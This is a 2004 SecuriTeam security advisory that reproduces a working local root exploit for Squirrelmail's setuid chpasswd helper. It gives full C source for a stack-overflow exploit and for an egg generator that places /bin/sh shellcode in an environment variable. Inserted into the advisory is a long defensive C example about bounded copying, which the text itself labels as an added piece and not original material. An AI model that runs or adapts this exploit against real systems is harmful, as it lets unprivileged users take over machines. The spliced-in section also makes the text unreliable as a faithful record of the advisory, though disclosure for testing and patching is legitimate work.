[UNIX] Squirrelmail Change_passwd Buffer Overflow Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 04/19/04

    To: list@securiteam.com
    Date: 19 Apr 2004 12:14:39 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Squirrelmail Change_passwd Buffer Overflow Exploit
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in our previous article, Squirrelmail Change_passwd Buffer
    Overflow (<http://www.securiteam.com/unixfocus/5OP0F2ACKA.html>), a
    vulnerability in the product allows local attackers to gain elevated
    privileges by overflowing an internal buffer. The following exploit code
    can be used to test your system for the mentioned vulnerability.
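    The root cause described above, an internal buffer filled from a
    command-line argument without a length check, can be illustrated with the
    following added example. It is not part of this advisory or of
    Squirrelmail's chpasswd: NAME_MAX_LEN, LONG_ARG_LEN and every function
    name are assumptions chosen for illustration. It places the unbounded copy
    pattern next to a length-checked copy and a character-set check of the
    kind a setuid helper should perform before using a caller-supplied
    username, and shows that a constructed 199-byte argument is rejected
    rather than copied.

```c
/* Added example, not part of the SecuriTeam advisory or of Squirrelmail's
 * chpasswd: the unbounded argv copy pattern behind a stack buffer overflow,
 * next to a length-checked copy plus argument validation that a setuid
 * helper should perform. NAME_MAX_LEN, LONG_ARG_LEN and all function names
 * are assumptions chosen for illustration. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX_LEN 64      /* assumed size of the internal buffer */
#define LONG_ARG_LEN 199     /* constructed oversized argument, roughly the
                                size of the 200-byte buffer the exploit builds */

/* Vulnerable pattern: strcpy trusts the caller-controlled length, so an
 * argument longer than dst overwrites whatever follows dst on the stack. */
void copy_arg_unbounded(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened form: refuse any argument that does not fit, NUL included. */
int copy_arg_bounded(char *dst, size_t dstsize, const char *src)
{
    const char *nul = memchr(src, '\0', dstsize);  /* NUL within dstsize bytes? */
    if (nul == NULL)
        return -1;                /* too long: reject, never truncate silently */
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* A privileged helper should also restrict the character set of a username,
 * so the argument cannot smuggle shell or format metacharacters downstream. */
int validate_username(const char *s)
{
    const char *nul = memchr(s, '\0', NAME_MAX_LEN);
    if (nul == NULL || nul == s)  /* too long, or empty */
        return 0;
    for (const char *p = s; p < nul; p++) {
        unsigned char c = (unsigned char)*p;
        if (!isalnum(c) && c != '_' && c != '-' && c != '.')
            return 0;
    }
    return 1;
}

/* Builds a constructed 199-byte argument and reports whether both checks
 * reject it (1) or not (0). */
int long_arg_is_rejected(void)
{
    char arg[LONG_ARG_LEN + 1];
    char dst[NAME_MAX_LEN];
    memset(arg, 'A', LONG_ARG_LEN);
    arg[LONG_ARG_LEN] = '\0';
    return copy_arg_bounded(dst, sizeof dst, arg) == -1
        && validate_username(arg) == 0;
}

/* Reports whether a normal username is accepted and copied intact. */
int short_arg_is_accepted(void)
{
    char dst[NAME_MAX_LEN];
    return copy_arg_bounded(dst, sizeof dst, "alice") == 0
        && strcmp(dst, "alice") == 0
        && validate_username("alice") == 1;
}

int main(void)
{
    printf("short argument accepted: %d\n", short_arg_is_accepted());
    printf("long argument rejected:  %d\n", long_arg_is_rejected());
    return 0;
}
```

    The bounded copy rejects rather than truncates, because a silently
    truncated username can still reach the password store as a different
    account; the character-set check is the second line of defence for the
    same argument once it is passed on to other tools.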

    DETAILS

    Exploit:
    SPK-chpasswd.c:
    /*
    ** Squirrelmail's chpasswd local root exploit bY SpikE <spike_vrm at mail.com>
    ** Bug found bY Matias Neiff <matias at neiff.com.ar>
    **
    ** Usage: Execute setegg before running this exploit
    **
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>      /* execl */
    #include <sys/types.h>
    #include <sys/wait.h>

    #define BUFSIZE 200

    char *Egg;
    int EggAddr;
    char *chpasswd;

    void doExploit()
    {
     char Buffer[BUFSIZE];
     int *Ptr = (int *)Buffer;
     int i;

     fprintf(stdout,"[+] Egg address: %#010x\n",EggAddr);

     // Build evil buffer
     for(i=0;i<BUFSIZE-4;i+=4)
      *Ptr++ = EggAddr;
     *Ptr = 0;

     // eXplot it!!
     execl(chpasswd,"chpasswd",Buffer,"SPK","HACKED",0);

     // If reach here, error
     fprintf(stdout,"[-] %s not found!!!\n",chpasswd);
    }

    int main(int argc, char **argv)
    {
     printf("==[ Squirrelmail's chpasswd local root exploit bY SpikE <spike_vrm@mail.com> ]==\n\n");
     if(argc != 2)
     {
      printf("Usage: %s <chpasswd-full-path>\n\n",argv[0]);
      exit(0);
     }
     chpasswd = argv[1];
     // Get shellcode address
     Egg = getenv("spkEGG");
     EggAddr = (int)&Egg[0];

     if(EggAddr == 0)
     {
      printf("[-] spkEGG not found. Run \"setegg\" first.\n");
      exit(-1);
     }
     doExploit();

     return(0);
    }

    setegg.c:
    /*
    ** EGG generator bY SpikE <spike_vrm@mail.com>
    **
    ** Usage: Execute this file before running the exploit
    **
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>      /* memset, memcpy, strlen */
    #include <sys/types.h>   /* u_long */

    #define EGGSIZE 300

    char Shellcode[] =
            "AAAAAAA\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
            "\x4e\x08\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";

    int main()
    {
     char EGG[EGGSIZE];

     printf("[+] Creating EGG\n");

     memset(EGG,0,EGGSIZE);
     memcpy(EGG,Shellcode,strlen(Shellcode));
     memcpy(EGG,"spkEGG=",7);
     putenv(EGG);

     system("/bin/bash");
     return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:spike_vrm@mail.com> SpikE
    VrM.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
